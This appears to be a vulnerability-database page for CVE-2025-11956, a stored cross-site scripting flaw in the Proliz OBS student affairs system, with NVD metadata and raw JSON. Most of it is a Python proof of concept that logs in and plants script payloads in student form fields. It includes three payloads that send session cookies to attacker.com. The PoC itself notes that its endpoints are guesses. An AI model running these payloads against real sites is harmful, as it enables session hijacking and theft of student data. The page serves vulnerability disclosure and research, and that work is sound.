Security Vulnerability Report
CVE-2025-11956 CVSS 8.9 HIGH

Published: 2025-11-06 15:15:46
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Proliz Software Ltd. Co. OBS (Student Affairs Information System) allows Stored XSS. This issue affects OBS (Student Affairs Information System): before 25.0401.

CVSS Details

CVSS Score
8.9
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

No CPE configuration data is available in the NVD record. Affected product, as stated in the description:

Proliz OBS (Student Affairs Information System) < 25.0401

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import argparse

# CVE-2025-11956 Stored XSS PoC
# Target: Proliz OBS (Student Affairs Information System)
# Vulnerability: Improper Input Neutralization leading to Stored XSS
#
# NOTE: the endpoint paths and form field names used below are not given in the
# NVD description above; they are assumptions made by this PoC.


def exploit_stored_xss(target_url, username, password, payload):
    """
    Exploit stored XSS vulnerability in OBS system
    """
    session = requests.Session()

    # Step 1: Login to the system
    login_url = f"{target_url}/login"
    login_data = {
        'username': username,
        'password': password
    }

    try:
        response = session.post(login_url, data=login_data)
        print(f"[*] Login attempt: {response.status_code}")

        # Step 2: Inject XSS payload in student info form
        inject_url = f"{target_url}/student/add"
        inject_data = {
            'student_name': "<script>alert(document.cookie)</script>",
            'student_id': '12345',
            'notes': payload
        }
        response = session.post(inject_url, data=inject_data)
        print(f"[*] Payload injection: {response.status_code}")

        # Step 3: Verify stored XSS
        view_url = f"{target_url}/student/view/12345"
        response = session.get(view_url)
        if payload in response.text or '<script>' in response.text:
            print("[+] Stored XSS vulnerability confirmed!")
            return True
        else:
            print("[-] Payload not found in response")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


# Example payloads for CVE-2025-11956
PAYLOADS = [
    '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>',
    '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">',
    '<svg/onload=fetch("https://attacker.com/cookie?"+document.cookie)>'
]

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='CVE-2025-11956 PoC')
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-u', '--username', required=True, help='Username')
    parser.add_argument('-p', '--password', required=True, help='Password')
    args = parser.parse_args()

    for payload in PAYLOADS:
        print(f"[*] Testing payload: {payload}")
        exploit_stored_xss(args.target, args.username, args.password, payload)
```

References

https://www.usom.gov.tr/bildirim/tr-25-0379 (USOM advisory, as listed in the NVD record)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11956",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-06T15:15:46.093",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Proliz Software Ltd. Co. OBS (Student Affairs Information System) allows Stored XSS.This issue affects OBS (Student Affairs Information System): before 25.0401."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L",
            "baseScore": 8.9,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.usom.gov.tr/bildirim/tr-25-0379",
        "source": "[email protected]"
      }
    ]
  }
}
```